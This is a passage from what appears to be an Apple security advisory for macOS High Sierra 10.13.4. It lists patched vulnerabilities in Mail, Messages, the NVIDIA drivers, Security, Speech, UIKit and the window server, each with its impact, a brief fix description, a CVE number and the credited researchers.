Description: An issue existed in the handling of encrypted Mail. This issue was addressed with improved isolation of MIME in Mail.

CVE-2018-4227: Damian Poddebniak of Münster University of Applied Sciences, Christian Dresen of Münster University of Applied Sciences, Jens Müller of Ruhr University Bochum, Fabian Ising of Münster University of Applied Sciences, Sebastian Schinzel of Münster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, Jörg Schwenk of Ruhr University Bochum

**Messages**

Available for: macOS High Sierra 10.13.4

Impact: A local user may be able to conduct impersonation attacks

Description: An injection issue was addressed with improved input validation.

CVE-2018-4235: Anurodh Pokharel of Salesforce.com

**Messages**

Available for: macOS High Sierra 10.13.4

Impact: Processing a maliciously crafted message may lead to a denial of service

Description: This issue was addressed with improved message validation.

CVE-2018-4240: Sriram (@Sri\_Hxor) of PrimeFort Pvt. Ltd

**NVIDIA Graphics Drivers**

Available for: macOS High Sierra 10.13.4

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2018-4230: Ian Beer of Google Project Zero

**Security**

Available for: macOS High Sierra 10.13.4

Impact: Users may be tracked by malicious websites using client certificates

Description: An issue existed in the handling of S-MIME certificates. This issue was addressed with improved validation of S-MIME certificates.

CVE-2018-4221: Damian Poddebniak of Münster University of Applied Sciences, Christian Dresen of Münster University of Applied Sciences, Jens Müller of Ruhr University Bochum, Fabian Ising of Münster University of Applied Sciences, Sebastian Schinzel of Münster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, Jörg Schwenk of Ruhr University Bochum

**Security**

Available for: macOS High Sierra 10.13.4

Impact: A local user may be able to read a persistent account identifier

Description: An authorization issue was addressed with improved state management.

CVE-2018-4223: Abraham Masri (@cheesecakeufo)

**Security**

Available for: macOS High Sierra 10.13.4

Impact: A local user may be able to read a persistent device identifier

Description: An authorization issue was addressed with improved state management.

CVE-2018-4224: Abraham Masri (@cheesecakeufo)

**Security**

Available for: macOS High Sierra 10.13.4

Impact: A local user may be able to modify the state of the Keychain

Description: An authorization issue was addressed with improved state management.

CVE-2018-4225: Abraham Masri (@cheesecakeufo)

**Security**

Available for: macOS High Sierra 10.13.4

Impact: A local user may be able to view sensitive user information

Description: An authorization issue was addressed with improved state management.

CVE-2018-4226: Abraham Masri (@cheesecakeufo)

**Speech**

Available for: macOS High Sierra 10.13.4

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: A sandbox issue existed in the handling of microphone access. This issue was addressed with improved handling of microphone access.

CVE-2018-4184: Jakob Rieck (@0xdead10cc) of the Security in Distributed Systems Group, University of Hamburg

**UIKit**

Available for: macOS High Sierra 10.13.4

Impact: Processing a maliciously crafted text file may lead to a denial of service

Description: A validation issue existed in the handling of text. This issue was addressed with improved validation of text.

CVE-2018-4198: Hunter Byrnes

**Windows Server**

Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2018-4193: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro’s Zero Day Initiative, Richard Zhu (fluorescence) working with Trend Micro’s Zero Day Initiative

Entry updated October 8, 2019

Tag

#apple